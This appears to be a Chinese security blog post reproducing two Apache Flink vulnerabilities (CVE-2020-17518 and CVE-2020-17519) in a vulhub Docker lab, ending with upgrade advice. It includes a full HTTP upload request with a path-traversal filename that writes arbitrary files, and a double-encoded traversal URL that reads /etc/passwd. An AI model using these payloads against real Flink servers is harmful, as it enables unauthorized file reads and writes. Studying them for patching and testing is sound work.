CVE-2020-17518&17519:Flink两个漏洞复现

admin 2021年4月25日07:25:28评论52 views字数 1848阅读6分9秒阅读模式



上方蓝色字体关注我们,一起学安全!
作者:柠檬蔷薇@Timeline Sec
本文字数:875
阅读时长:2~3min
声明:请勿用作违法用途,否则后果自负


0x01 简介


Apache Flink 是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。


0x02 漏洞概述


编号:CVE-2020-17518&17519


Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致目录遍历和任意文件写入漏洞。


CVE-2020-17519:攻击者可通过REST API使用../跳目录实现系统任意文件读取;CVE-2020-17518:通过构造恶意的http header,可实现远程文件写入。


0x03 影响版本


1、CVE-2020-17518:

Apache Flink 1.5.1 ~ 1.11.2


2、CVE-2020-17519

Apache Flink 1.11.0、1.11.1、1.11.2


0x04 环境搭建


CVE-2020-17518

使用vulhub进行安装,vulhub地址:

https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518


进入目录

cd vulhub-master/flink/CVE-2020-17518


安装环境

sudo docker-compose up -d


CVE-2020-17518&17519:Flink两个漏洞复现


接着访问http://your-ip:8081


CVE-2020-17518&17519:Flink两个漏洞复现


CVE-2020-17519

Vulhub地址:

https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519


进入目录

cd vulhub-master/flink/CVE-2020-17519


安装环境

sudo docker-compose up -d


CVE-2020-17518&17519:Flink两个漏洞复现


接着访问:http://your-ip:8081


CVE-2020-17518&17519:Flink两个漏洞复现


0x05 漏洞复现


CVE-2020-17518

1、构建数据包进行发送

POST /jars/upload HTTP/1.1Host: localhost:8081Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (X11; Linux x86_64;rv:78.0) Gecko/20100101 Firefox/78.0Connection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryoZ8meKnrrso89R6YContent-Length: 187 ------WebKitFormBoundaryoZ8meKnrrso89R6YContent-Disposition: form-data;name="jarfile"; filename="../../../../../../tmp/success" success------WebKitFormBoundaryoZ8meKnrrso89R6Y--


CVE-2020-17518&17519:Flink两个漏洞复现


2、 此时进入容器,查看success文件是否创建成功

cd vulhub-master/flink/CVE-2020-17518docker psdocker exec -it CONTAINER ID bashls /tmp


CVE-2020-17518&17519:Flink两个漏洞复现


如上图所示,镜像里面有了success文件,执行成功


CVE-2020-17519

POC:

http://ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd


CVE-2020-17518&17519:Flink两个漏洞复现

0x06 修复方式



临时修复建议:

若业务环境允许,使用白名单限制相关web项目的访问来降低风险。

 

官方已发布安全版本,请及时下载升级至安全版本。


下载链接:

https://flink.apache.org/zh/downloads.html


参考链接:
https://github.com/vulhub/


CVE-2020-17518&17519:Flink两个漏洞复现

CVE-2020-17518&17519:Flink两个漏洞复现
阅读原文看更多复现文章
Timeline Sec 团队
安全路上,与你并肩前行












本文始发于微信公众号(Timeline Sec):CVE-2020-17518&17519:Flink两个漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月25日07:25:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2020-17518&17519:Flink两个漏洞复现https://cn-sec.com/archives/241537.html

发表评论

匿名网友 填写信息